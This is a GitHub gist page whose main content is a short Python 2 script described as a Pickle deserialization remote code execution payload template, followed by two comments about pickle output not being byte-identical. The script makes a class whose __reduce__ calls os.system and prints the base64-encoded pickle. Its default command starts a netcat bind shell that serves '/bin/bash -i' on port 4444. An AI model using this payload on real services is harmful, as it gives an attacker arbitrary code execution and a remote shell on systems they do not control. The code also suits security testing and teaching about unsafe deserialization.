Skip to content

Instantly share code, notes, and snippets.

@mgeeky
Last active February 3, 2023 00:32
Embed
What would you like to do?
Python's Pickle Remote Code Execution payload template.
#!/usr/bin/python
#
# Pickle deserialization RCE payload.
# To be invoked with command to execute at it's first parameter.
# Otherwise, the default one will be used.
#
import cPickle
import sys
import base64
DEFAULT_COMMAND = "netcat -c '/bin/bash -i' -l -p 4444"
COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND
class PickleRce(object):
def __reduce__(self):
import os
return (os.system,(COMMAND,))
print base64.b64encode(cPickle.dumps(PickleRce()))
@shafdo
Copy link

shafdo commented Aug 1, 2021

No problem @Anon-Exploiter. Thanks for the response 👍. That was a good explanation.

So I believe the conclusion is that "There is no guarantee that seemingly identical objects will produce identical pickle strings.". Which means, even though the pickle strings (serialized data) generated from cPickle.dumps() or pickle.dumps() does not give exact identical results, when deserializing them with loads() we get the same results.

Thank you @Anon-Exploiter for clearing my doubt 💯. Have a nice day.

@Anon-Exploiter
Copy link

No problem @Anon-Exploiter. Thanks for the response 👍. That was a good explanation.

So I believe the conclusion is that "There is no guarantee that seemingly identical objects will produce identical pickle strings.". Which means, even though the pickle strings (serialized data) generated from cPickle.dumps() or pickle.dumps() does not give exact identical results, when deserializing them with loads() we get the same results.

Thank you @Anon-Exploiter for clearing my doubt 💯. Have a nice day.

You're welcome! 🐱

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment